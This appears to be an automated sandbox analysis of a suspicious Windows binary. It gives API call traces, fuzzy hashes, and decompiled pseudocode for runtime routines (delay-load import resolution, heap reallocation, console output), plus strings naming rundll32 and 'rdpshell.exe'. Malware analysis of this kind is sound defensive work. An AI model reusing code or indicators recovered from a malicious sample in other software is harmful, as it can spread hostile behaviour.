                                                • LeaveCriticalSection.KERNEL32(00502C0C,00502C0C,00000000,00408F5C,?,?,?,00000000,?,00409824,00000000,00409883,?,?,00000000,00000000), ref: 00408EA9
                                                • IsValidLocale.KERNEL32(00000000,00000002,00502C0C,00502C0C,00000000,00408F5C,?,?,?,00000000,?,00409824,00000000,00409883), ref: 00408EBB
                                                • EnterCriticalSection.KERNEL32(00502C0C,00000000,00000002,00502C0C,00502C0C,00000000,00408F5C,?,?,?,00000000,?,00409824,00000000,00409883), ref: 00408F18
                                                • LeaveCriticalSection.KERNEL32(00502C0C,00502C0C,00000000,00000002,00502C0C,00502C0C,00000000,00408F5C,?,?,?,00000000,?,00409824,00000000,00409883), ref: 00408F41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                • String ID: en-US,en,
                                                • API String ID: 975949045-3579323720
                                                • Opcode ID: 486056097c644745153e390375a7604f86461bb147bf653f343bd5b99f6a0b8a
                                                • Instruction ID: b0fb0639c22291b311ffd7e014b7402ceef5e9ca1ca2eb31d877daafb52af612
                                                • Opcode Fuzzy Hash: 486056097c644745153e390375a7604f86461bb147bf653f343bd5b99f6a0b8a
                                                • Instruction Fuzzy Hash: 6F21C02070460067E725B77A8E5B71E2699AB44708F60443FB480B32D2DEBC9D0596AF
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNEL32(00000000,FFFFFFDC,007731CA), ref: 007732B3
                                                • Sleep.KERNEL32(0000000A,00000000,FFFFFFDC,007731CA), ref: 007732C9
                                                • Sleep.KERNEL32(00000000,?,?,FFFFFFDC,007731CA), ref: 007732F7
                                                • Sleep.KERNEL32(0000000A,00000000,?,?,FFFFFFDC,007731CA), ref: 0077330D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: x+P$x+P
                                                • API String ID: 3472027048-2134562320
                                                • Opcode ID: 6a0de7adfa187165a96d4983837ab3814e824e6b25107f4c3aea22e2ed4c806d
                                                • Instruction ID: ddbdd5a4d3ca0cfd4b2e644b3c233b253d4e0062526243a87ee6cfd39e8a1491
                                                • Opcode Fuzzy Hash: 6a0de7adfa187165a96d4983837ab3814e824e6b25107f4c3aea22e2ed4c806d
                                                • Instruction Fuzzy Hash: 57C134726013508BDF15CF28E88472ABBE0FB95350F08C2AED45C8B3D2D7789A49E790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E0040B80C(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                				long _v8;
                                                				signed int _v12;
                                                				long _v16;
                                                				void* _v20;
                                                				long _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				intOrPtr _v44;
                                                				struct HINSTANCE__** _v48;
                                                				CHAR* _v52;
                                                				void _v56;
                                                				long _v60;
                                                				_Unknown_base(*)()* _v64;
                                                				struct HINSTANCE__* _v68;
                                                				CHAR* _v72;
                                                				signed int _v76;
                                                				CHAR* _v80;
                                                				intOrPtr* _v84;
                                                				void* _v88;
                                                				void _v92;
                                                				signed int _t104;
                                                				signed int _t106;
                                                				signed int _t108;
                                                				long _t113;
                                                				intOrPtr* _t119;
                                                				void* _t124;
                                                				void _t126;
                                                				long _t128;
                                                				struct HINSTANCE__* _t142;
                                                				long _t166;
                                                				signed int* _t190;
                                                				_Unknown_base(*)()* _t191;
                                                				void* _t194;
                                                				intOrPtr _t196;
                                                
                                                				_push(_a4);
                                                				memcpy( &_v56, 0x4fdc28, 8 << 2);
                                                				_pop(_t194);
                                                				_v56 =  *0x4fdc28;
                                                				_v52 = E0040BCBC( *0x004FDC2C);
                                                				_v48 = E0040BCCC( *0x004FDC30);
                                                				_v44 = E0040BCDC( *0x004FDC34);
                                                				_v40 = E0040BCEC( *0x004FDC38);
                                                				_v36 = E0040BCEC( *0x004FDC3C);
                                                				_v32 = E0040BCEC( *0x004FDC40);
                                                				_v28 =  *0x004FDC44;
                                                				memcpy( &_v92, 0x4fdc48, 9 << 2);
                                                				_t196 = _t194;
                                                				_v88 = 0x4fdc48;
                                                				_v84 = _a8;
                                                				_v80 = _v52;
                                                				if((_v56 & 0x00000001) == 0) {
                                                					_t166 =  *0x4fdc6c; // 0x0
                                                					_v8 = _t166;
                                                					_v8 =  &_v92;
                                                					RaiseException(0xc06d0057, 0, 1,  &_v8);
                                                					return 0;
                                                				}
                                                				_t104 = _a8 - _v44;
                                                				_t142 =  *_v48;
                                                				if(_t104 < 0) {
                                                					_t104 = _t104 + 3;
                                                				}
                                                				_v12 = _t104 >> 2;
                                                				_t106 = _v12;
                                                				_t190 = (_t106 << 2) + _v40;
                                                				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
                                                				_v76 = _t108;
                                                				if(_t108 == 0) {
                                                					_v72 =  *_t190 & 0x0000ffff;
                                                				} else {
                                                					_v72 = E0040BCFC( *_t190) + 2;
                                                				}
                                                				_t191 = 0;
                                                				if( *0x503630 == 0) {
                                                					L10:
                                                					if(_t142 != 0) {
                                                						L25:
                                                						_v68 = _t142;
                                                						if( *0x503630 != 0) {
                                                							_t191 =  *0x503630(2,  &_v92);
                                                						}
                                                						if(_t191 != 0) {
                                                							L36:
                                                							if(_t191 == 0) {
                                                								_v60 = GetLastError();
                                                								if( *0x503634 != 0) {
                                                									_t191 =  *0x503634(4,  &_v92);
                                                								}
                                                								if(_t191 == 0) {
                                                									_t113 =  *0x4fdc74; // 0x0
                                                									_v24 = _t113;
                                                									_v24 =  &_v92;
                                                									RaiseException(0xc06d007f, 0, 1,  &_v24);
                                                									_t191 = _v64;
                                                								}
                                                							}
                                                							goto L41;
                                                						} else {
                                                							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
                                                								L35:
                                                								_t191 = GetProcAddress(_t142, _v72);
                                                								goto L36;
                                                							} else {
                                                								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
                                                								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
                                                									goto L35;
                                                								} else {
                                                									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
                                                									if(_t191 == 0) {
                                                										goto L35;
                                                									}
                                                									L41:
                                                									 *_a8 = _t191;
                                                									goto L42;
                                                								}
                                                							}
                                                						}
                                                					}
                                                					if( *0x503630 != 0) {
                                                						_t142 =  *0x503630(1,  &_v92);
                                                					}
                                                					if(_t142 == 0) {
                                                						_t142 = LoadLibraryA(_v80);
                                                					}
                                                					if(_t142 != 0) {
                                                						L20:
                                                						if(_t142 == E0040B190(_v48, _t142)) {
                                                							FreeLibrary(_t142);
                                                						} else {
                                                							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
                                                								_t124 = LocalAlloc(0x40, 8);
                                                								_v20 = _t124;
                                                								if(_t124 != 0) {
                                                									 *((intOrPtr*)(_v20 + 4)) = _t196;
                                                									_t126 =  *0x4fdc24; // 0x0
                                                									 *_v20 = _t126;
                                                									 *0x4fdc24 = _v20;
                                                								}
                                                							}
                                                						}
                                                						goto L25;
                                                					} else {
                                                						_v60 = GetLastError();
                                                						if( *0x503634 != 0) {
                                                							_t142 =  *0x503634(3,  &_v92);
                                                						}
                                                						if(_t142 != 0) {
                                                							goto L20;
                                                						} else {
                                                							_t128 =  *0x4fdc70; // 0x0
                                                							_v16 = _t128;
                                                							_v16 =  &_v92;
                                                							RaiseException(0xc06d007e, 0, 1,  &_v16);
                                                							return _v64;
                                                						}
                                                					}
                                                				} else {
                                                					_t191 =  *0x503630(0,  &_v92);
                                                					if(_t191 == 0) {
                                                						goto L10;
                                                					} else {
                                                						L42:
                                                						if( *0x503630 != 0) {
                                                							_v60 = 0;
                                                							_v68 = _t142;
                                                							_v64 = _t191;
                                                							 *0x503630(5,  &_v92);
                                                						}
                                                						return _t191;
                                                					}
                                                				}
                                                			}







































                                                0x0040b820
                                                0x0040b826
                                                0x0040b828
                                                0x0040b82b
                                                0x0040b838
                                                0x0040b845
                                                0x0040b852
                                                0x0040b85f
                                                0x0040b86c
                                                0x0040b879
                                                0x0040b882
                                                0x0040b890
                                                0x0040b892
                                                0x0040b893
                                                0x0040b899
                                                0x0040b89f
                                                0x0040b8a6
                                                0x0040b8a8
                                                0x0040b8ae
                                                0x0040b8b4
                                                0x0040b8c4
                                                0x00000000
                                                0x0040b8c9
                                                0x0040b8d6
                                                0x0040b8db
                                                0x0040b8dd
                                                0x0040b8df
                                                0x0040b8df
                                                0x0040b8e5
                                                0x0040b8e8
                                                0x0040b8f0
                                                0x0040b8fa
                                                0x0040b8fd
                                                0x0040b902
                                                0x0040b91d
                                                0x0040b904
                                                0x0040b910
                                                0x0040b910
                                                0x0040b920
                                                0x0040b929
                                                0x0040b942
                                                0x0040b944
                                                0x0040ba06
                                                0x0040ba06
                                                0x0040ba10
                                                0x0040ba1e
                                                0x0040ba1e
                                                0x0040ba22
                                                0x0040ba6f
                                                0x0040ba71
                                                0x0040ba78
                                                0x0040ba82
                                                0x0040ba90
                                                0x0040ba90
                                                0x0040ba94
                                                0x0040ba96
                                                0x0040ba9b
                                                0x0040baa1
                                                0x0040bab1
                                                0x0040bab6
                                                0x0040bab6
                                                0x0040ba94
                                                0x00000000
                                                0x0040ba24
                                                0x0040ba28
                                                0x0040ba63
                                                0x0040ba6d
                                                0x00000000
                                                0x0040ba30
                                                0x0040ba33
                                                0x0040ba3b
                                                0x00000000
                                                0x0040ba54
                                                0x0040ba5a
                                                0x0040ba5f
                                                0x00000000
                                                0x00000000
                                                0x0040bab9
                                                0x0040babc
                                                0x00000000
                                                0x0040babc
                                                0x0040ba3b
                                                0x0040ba28
                                                0x0040ba22
                                                0x0040b951
                                                0x0040b95f
                                                0x0040b95f
                                                0x0040b963
                                                0x0040b96e
                                                0x0040b96e
                                                0x0040b972
                                                0x0040b9bf
                                                0x0040b9cb
                                                0x0040ba01
                                                0x0040b9cd
                                                0x0040b9d1
                                                0x0040b9d7
                                                0x0040b9dc
                                                0x0040b9e1
                                                0x0040b9e8
                                                0x0040b9ee
                                                0x0040b9f3
                                                0x0040b9f8
                                                0x0040b9f8
                                                0x0040b9e1
                                                0x0040b9d1
                                                0x00000000
                                                0x0040b974
                                                0x0040b979
                                                0x0040b983
                                                0x0040b991
                                                0x0040b991
                                                0x0040b995
                                                0x00000000
                                                0x0040b997
                                                0x0040b997
                                                0x0040b99c
                                                0x0040b9a2
                                                0x0040b9b2
                                                0x00000000
                                                0x0040b9b7
                                                0x0040b995
                                                0x0040b92b
                                                0x0040b937
                                                0x0040b93b
                                                0x00000000
                                                0x0040b93d
                                                0x0040babe
                                                0x0040bac5
                                                0x0040bac9
                                                0x0040bacc
                                                0x0040bacf
                                                0x0040bad8
                                                0x0040bad8
                                                0x00000000
                                                0x0040bade
                                                0x0040b93b

                                                APIs
                                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040B8C4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 3c69c3a2c73478c5e45cecb158df72672313abf9503702f4a583c6c81048d671
                                                • Instruction ID: 0ec9b079ba997fd56ee87b98193e146ec9b68534d60f81be73d745ca747ed7da
                                                • Opcode Fuzzy Hash: 3c69c3a2c73478c5e45cecb158df72672313abf9503702f4a583c6c81048d671
                                                • Instruction Fuzzy Hash: 9CA170B5A002099FDB24CFA8D881BAEB7F5FB58300F10413AE515BB390DB749945CB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: 8O$C:\Windows\System32\rundll32.exe$D$rdpshell.exe$system32\rundll32.exe$O
                                                • API String ID: 0-2077156839
                                                • Opcode ID: 69cfe882e65ef2feb8b57c3542bed65357a34dbd33a214a592ec6338d3639887
                                                • Instruction ID: a0acc53d7566dfec7757381ac815b47a2e3664634cde6d0c22cc286e61a40720
                                                • Opcode Fuzzy Hash: 69cfe882e65ef2feb8b57c3542bed65357a34dbd33a214a592ec6338d3639887
                                                • Instruction Fuzzy Hash: 7722F771910249DFDB10DFAAE885AADBBF5FB08306F11843AE404E7271D775A960CF29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E00403874(int __eax, void* __ecx, void* __edx) {
                                                				long _v12;
                                                				int _t4;
                                                				long _t7;
                                                				void* _t11;
                                                				long _t12;
                                                				void* _t13;
                                                				long _t18;
                                                
                                                				_t4 = __eax;
                                                				_t24 = __edx;
                                                				_t20 = __eax;
                                                				if( *0x500054 == 0) {
                                                					_push(0x2010);
                                                					_push(__edx);
                                                					_push(__eax);
                                                					_push(0);
                                                					L00402844();
                                                				} else {
                                                					_t7 = E00406DA4(__edx);
                                                					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
                                                					_t11 =  *0x4fd05c; // 0x4029e4
                                                					_t12 = E00406DA4(_t11);
                                                					_t13 =  *0x4fd05c; // 0x4029e4
                                                					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
                                                					_t18 = E00406DA4(_t20);
                                                					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
                                                				}
                                                				return _t4;
                                                			}










                                                0x00403874
                                                0x00403877
                                                0x00403879
                                                0x00403882
                                                0x004038e5
                                                0x004038ea
                                                0x004038eb
                                                0x004038ec
                                                0x004038ee
                                                0x00403884
                                                0x0040388d
                                                0x0040389c
                                                0x004038a8
                                                0x004038ad
                                                0x004038b3
                                                0x004038c1
                                                0x004038cf
                                                0x004038de
                                                0x004038de
                                                0x004038f6

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F4,004029E8,00000000,?,00000000,?,?,00000000,0040421F), ref: 00403896
                                                • WriteFile.KERNEL32(00000000,000000F4,004029E8,00000000,?,00000000,?,?,00000000,0040421F), ref: 0040389C
                                                • GetStdHandle.KERNEL32(000000F4,004029E4,00000000,?,00000000,00000000,000000F4,004029E8,00000000,?,00000000,?,?,00000000,0040421F), ref: 004038BB
                                                • WriteFile.KERNEL32(00000000,000000F4,004029E4,00000000,?,00000000,00000000,000000F4,004029E8,00000000,?,00000000,?,?,00000000,0040421F), ref: 004038C1
                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,004029E4,00000000,?,00000000,00000000,000000F4,004029E8,00000000,?), ref: 004038D8
                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,004029E4,00000000,?,00000000,00000000,000000F4,004029E8,00000000), ref: 004038DE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileHandleWrite
                                                • String ID: )@
                                                • API String ID: 3320372497-3601550055
                                                • Opcode ID: 83033d0aa5524322eedb2eef276f9990ba4be1cd920fb4ccc56adaf2abc8a3e6
                                                • Instruction ID: 9e7843783f02372641eb41feef89d2fd432e8f50bade524b17204604d823b9d1
                                                • Opcode Fuzzy Hash: 83033d0aa5524322eedb2eef276f9990ba4be1cd920fb4ccc56adaf2abc8a3e6
                                                • Instruction Fuzzy Hash: F10136A27442107DE640B7AADD8AF5B17CC9F8572DF10463B7114F20D3C9BC8D54927A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E00403528(signed int __eax, signed int __edx, void* __edi) {
                                                				signed int __ebx;
                                                				void* __esi;
                                                				signed int _t69;
                                                				signed int _t78;
                                                				signed int _t93;
                                                				long _t94;
                                                				void* _t100;
                                                				signed int _t102;
                                                				signed int _t109;
                                                				signed int _t115;
                                                				signed int _t123;
                                                				signed int _t129;
                                                				void* _t131;
                                                				signed int _t140;
                                                				unsigned int _t148;
                                                				signed int _t150;
                                                				long _t152;
                                                				signed int _t156;
                                                				intOrPtr _t161;
                                                				signed int _t166;
                                                				signed int _t170;
                                                				unsigned int _t171;
                                                				intOrPtr _t174;
                                                				intOrPtr _t192;
                                                				signed int _t195;
                                                				signed int _t196;
                                                				signed int _t197;
                                                				void* _t205;
                                                				unsigned int _t207;
                                                				signed int _t213;
                                                				void* _t225;
                                                				signed int _t227;
                                                				signed int _t228;
                                                				signed int _t230;
                                                				void* _t232;
                                                				signed int _t233;
                                                				signed int _t234;
                                                				signed int _t238;
                                                				signed int _t241;
                                                				void* _t243;
                                                				intOrPtr* _t244;
                                                
                                                				_t176 = __edx;
                                                				_t66 = __eax;
                                                				_t166 =  *(__eax - 4);
                                                				_t217 = __eax;
                                                				if((_t166 & 0x00000007) != 0) {
                                                					__eflags = _t166 & 0x00000005;
                                                					if((_t166 & 0x00000005) != 0) {
                                                						_pop(_t217);
                                                						_pop(_t145);
                                                						__eflags = _t166 & 0x00000003;
                                                						if((_t166 & 0x00000003) == 0) {
                                                							_push(_t145);
                                                							_push(__eax);
                                                							_push(__edi);
                                                							_push(_t225);
                                                							_t244 = _t243 + 0xffffffe0;
                                                							_t218 = __edx;
                                                							_t202 = __eax;
                                                							_t69 =  *(__eax - 4);
                                                							_t148 = (0xfffffff0 & _t69) - 0x14;
                                                							if(0xfffffff0 >= __edx) {
                                                								__eflags = __edx - _t148 >> 1;
                                                								if(__edx < _t148 >> 1) {
                                                									_t150 = E00402FAC(__edx);
                                                									__eflags = _t150;
                                                									if(_t150 != 0) {
                                                										__eflags = _t218 - 0x40a2c;
                                                										if(_t218 > 0x40a2c) {
                                                											_t78 = _t202 - 0x10;
                                                											__eflags = _t78;
                                                											 *((intOrPtr*)(_t78 + 8)) = _t218;
                                                										}
                                                										E00402B68(_t202, _t218, _t150);
                                                										E00403330(_t202, _t202, _t225);
                                                									}
                                                								} else {
                                                									_t150 = __eax;
                                                									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
                                                								}
                                                							} else {
                                                								if(0xfffffff0 <= __edx) {
                                                									_t227 = __edx;
                                                								} else {
                                                									_t227 = 0xbadb9d;
                                                								}
                                                								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
                                                								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
                                                								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
                                                									L12:
                                                									_t150 = E00402FAC(_t227);
                                                									__eflags = _t150;
                                                									if(_t150 != 0) {
                                                										__eflags = _t227 - 0x40a2c;
                                                										if(_t227 > 0x40a2c) {
                                                											_t93 = _t150 - 0x10;
                                                											__eflags = _t93;
                                                											 *((intOrPtr*)(_t93 + 8)) = _t218;
                                                										}
                                                										E00402B38(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
                                                										E00403330(_t202, _t202, _t227);
                                                									}
                                                								} else {
                                                									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
                                                									_t94 =  *(_t244 + 0x10);
                                                									if(_t218 - _t148 >= _t94) {
                                                										goto L12;
                                                									} else {
                                                										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
                                                										if(_t94 < _t152) {
                                                											_t152 = _t94;
                                                										}
                                                										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
                                                											goto L12;
                                                										} else {
                                                											_t100 = _t202 - 0x10;
                                                											 *((intOrPtr*)(_t100 + 8)) = _t218;
                                                											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
                                                											_t150 = _t202;
                                                										}
                                                									}
                                                								}
                                                							}
                                                							return _t150;
                                                						} else {
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                					} else {
                                                						_t170 = _t166 & 0xfffffff0;
                                                						_push(__edi);
                                                						_t205 = _t170 + __eax;
                                                						_t171 = _t170 - 4;
                                                						_t156 = _t166 & 0x0000000f;
                                                						__eflags = __edx - _t171;
                                                						_push(_t225);
                                                						if(__edx > _t171) {
                                                							_t102 =  *(_t205 - 4);
                                                							__eflags = _t102 & 0x00000001;
                                                							if((_t102 & 0x00000001) == 0) {
                                                								L75:
                                                								asm("adc edi, 0xffffffff");
                                                								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
                                                								_t207 = _t171;
                                                								_t109 = E00402FAC(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
                                                								_t192 = _t176;
                                                								__eflags = _t109;
                                                								if(_t109 == 0) {
                                                									goto L73;
                                                								} else {
                                                									__eflags = _t228 - 0x40a2c;
                                                									if(_t228 > 0x40a2c) {
                                                										 *((intOrPtr*)(_t109 - 8)) = _t192;
                                                									}
                                                									_t230 = _t109;
                                                									E00402B38(_t217, _t207, _t109);
                                                									E00403330(_t217, _t207, _t230);
                                                									return _t230;
                                                								}
                                                							} else {
                                                								_t115 = _t102 & 0xfffffff0;
                                                								_t232 = _t171 + _t115;
                                                								__eflags = __edx - _t232;
                                                								if(__edx > _t232) {
                                                									goto L75;
                                                								} else {
                                                									__eflags =  *0x500055;
                                                									if(__eflags == 0) {
                                                										L66:
                                                										__eflags = _t115 - 0xb30;
                                                										if(_t115 >= 0xb30) {
                                                											E00402B84(_t205);
                                                											_t176 = _t176;
                                                											_t171 = _t171;
                                                										}
                                                										asm("adc edi, 0xffffffff");
                                                										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
                                                										_t195 = _t232 + 4 - _t123;
                                                										__eflags = _t195;
                                                										if(_t195 > 0) {
                                                											 *(_t217 + _t232 - 4) = _t195;
                                                											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
                                                											_t233 = _t123;
                                                											__eflags = _t195 - 0xb30;
                                                											if(_t195 >= 0xb30) {
                                                												__eflags = _t123 + _t217;
                                                												E00402BC4(_t123 + _t217, _t171, _t195);
                                                											}
                                                										} else {
                                                											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
                                                											_t233 = _t232 + 4;
                                                										}
                                                										_t234 = _t233 | _t156;
                                                										__eflags = _t234;
                                                										 *(_t217 - 4) = _t234;
                                                										 *0x500ae4 = 0;
                                                										_t109 = _t217;
                                                										L73:
                                                										return _t109;
                                                									} else {
                                                										while(1) {
                                                											asm("lock cmpxchg [0x500ae4], ah");
                                                											if(__eflags == 0) {
                                                												break;
                                                											}
                                                											asm("pause");
                                                											__eflags =  *0x500985;
                                                											if(__eflags != 0) {
                                                												continue;
                                                											} else {
                                                												Sleep(0);
                                                												_t176 = _t176;
                                                												_t171 = _t171;
                                                												asm("lock cmpxchg [0x500ae4], ah");
                                                												if(__eflags != 0) {
                                                													Sleep(0xa);
                                                													_t176 = _t176;
                                                													_t171 = _t171;
                                                													continue;
                                                												}
                                                											}
                                                											break;
                                                										}
                                                										_t156 = 0x0000000f &  *(_t217 - 4);
                                                										_t129 =  *(_t205 - 4);
                                                										__eflags = _t129 & 0x00000001;
                                                										if((_t129 & 0x00000001) == 0) {
                                                											L74:
                                                											 *0x500ae4 = 0;
                                                											goto L75;
                                                										} else {
                                                											_t115 = _t129 & 0xfffffff0;
                                                											_t232 = _t171 + _t115;
                                                											__eflags = _t176 - _t232;
                                                											if(_t176 > _t232) {
                                                												goto L74;
                                                											} else {
                                                												goto L66;
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							__eflags = __edx + __edx - _t171;
                                                							if(__edx + __edx < _t171) {
                                                								__eflags = __edx - 0xb2c;
                                                								if(__edx >= 0xb2c) {
                                                									L41:
                                                									_t32 = _t176 + 0xd3; // 0xbff
                                                									_t238 = (_t32 & 0xffffff00) + 0x30;
                                                									_t174 = _t171 + 4 - _t238;
                                                									__eflags =  *0x500055;
                                                									if(__eflags != 0) {
                                                										while(1) {
                                                											asm("lock cmpxchg [0x500ae4], ah");
                                                											if(__eflags == 0) {
                                                												break;
                                                											}
                                                											asm("pause");
                                                											__eflags =  *0x500985;
                                                											if(__eflags != 0) {
                                                												continue;
                                                											} else {
                                                												Sleep(0);
                                                												_t174 = _t174;
                                                												asm("lock cmpxchg [0x500ae4], ah");
                                                												if(__eflags != 0) {
                                                													Sleep(0xa);
                                                													_t174 = _t174;
                                                													continue;
                                                												}
                                                											}
                                                											break;
                                                										}
                                                										_t156 = 0x0000000f &  *(_t217 - 4);
                                                										__eflags = 0xf;
                                                									}
                                                									 *(_t217 - 4) = _t156 | _t238;
                                                									_t161 = _t174;
                                                									_t196 =  *(_t205 - 4);
                                                									__eflags = _t196 & 0x00000001;
                                                									if((_t196 & 0x00000001) != 0) {
                                                										_t131 = _t205;
                                                										_t197 = _t196 & 0xfffffff0;
                                                										_t161 = _t161 + _t197;
                                                										_t205 = _t205 + _t197;
                                                										__eflags = _t197 - 0xb30;
                                                										if(_t197 >= 0xb30) {
                                                											E00402B84(_t131);
                                                										}
                                                									} else {
                                                										 *(_t205 - 4) = _t196 | 0x00000008;
                                                									}
                                                									 *((intOrPtr*)(_t205 - 8)) = _t161;
                                                									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
                                                									__eflags = _t161 - 0xb30;
                                                									if(_t161 >= 0xb30) {
                                                										E00402BC4(_t217 + _t238, _t174, _t161);
                                                									}
                                                									 *0x500ae4 = 0;
                                                									return _t217;
                                                								} else {
                                                									__eflags = __edx - 0x2cc;
                                                									if(__edx < 0x2cc) {
                                                										_t213 = __edx;
                                                										_t140 = E00402FAC(__edx);
                                                										__eflags = _t140;
                                                										if(_t140 != 0) {
                                                											_t241 = _t140;
                                                											E00402B68(_t217, _t213, _t140);
                                                											E00403330(_t217, _t213, _t241);
                                                											_t140 = _t241;
                                                										}
                                                										return _t140;
                                                									} else {
                                                										_t176 = 0xb2c;
                                                										__eflags = _t171 - 0xb2c;
                                                										if(_t171 <= 0xb2c) {
                                                											goto L37;
                                                										} else {
                                                											goto L41;
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								L37:
                                                								return _t66;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					__ebx =  *__ecx;
                                                					__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                					__eflags = __ecx - __edx;
                                                					if(__ecx < __edx) {
                                                						__ecx = __ecx + __ecx + 0x20;
                                                						_push(__edi);
                                                						__edi = __edx;
                                                						__eax = 0;
                                                						__ecx = __ecx - __edx;
                                                						asm("adc eax, 0xffffffff");
                                                						__eax = 0 & __ecx;
                                                						__eax = (0 & __ecx) + __edx;
                                                						__eax = E00402FAC((0 & __ecx) + __edx);
                                                						__eflags = __eax;
                                                						if(__eax != 0) {
                                                							__eflags = __edi - 0x40a2c;
                                                							if(__edi > 0x40a2c) {
                                                								 *(__eax - 8) = __edi;
                                                							}
                                                							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                							__edx = __eax;
                                                							__edi = __eax;
                                                							 *((intOrPtr*)(__ebx + 0x1c))() = E00403330(__esi, __edi, __ebp);
                                                							__eax = __edi;
                                                						}
                                                						_pop(__edi);
                                                						_pop(__esi);
                                                						_pop(__ebx);
                                                						return __eax;
                                                					} else {
                                                						__ebx = 0x40 + __edx * 4;
                                                						__eflags = 0x40 + __edx * 4 - __ecx;
                                                						if(0x40 + __edx * 4 < __ecx) {
                                                							__ebx = __edx;
                                                							__eax = __edx;
                                                							__eax = E00402FAC(__edx);
                                                							__eflags = __eax;
                                                							if(__eax != 0) {
                                                								__ecx = __ebx;
                                                								__edx = __eax;
                                                								__ebx = __eax;
                                                								__esi = E00403330(__esi, __edi, __ebp);
                                                								__eax = __ebx;
                                                							}
                                                							_pop(__esi);
                                                							_pop(__ebx);
                                                							return __eax;
                                                						} else {
                                                							_pop(__esi);
                                                							_pop(__ebx);
                                                							return __eax;
                                                						}
                                                					}
                                                				}
                                                			}












































                                                0x00403528
                                                0x00403528
                                                0x00403528
                                                0x00403530
                                                0x00403532
                                                0x004035c0
                                                0x004035c3
                                                0x00403830
                                                0x00403831
                                                0x00403832
                                                0x00403835
                                                0x00402e60
                                                0x00402e61
                                                0x00402e62
                                                0x00402e63
                                                0x00402e64
                                                0x00402e67
                                                0x00402e69
                                                0x00402e70
                                                0x00402e79
                                                0x00402e7e
                                                0x00402f65
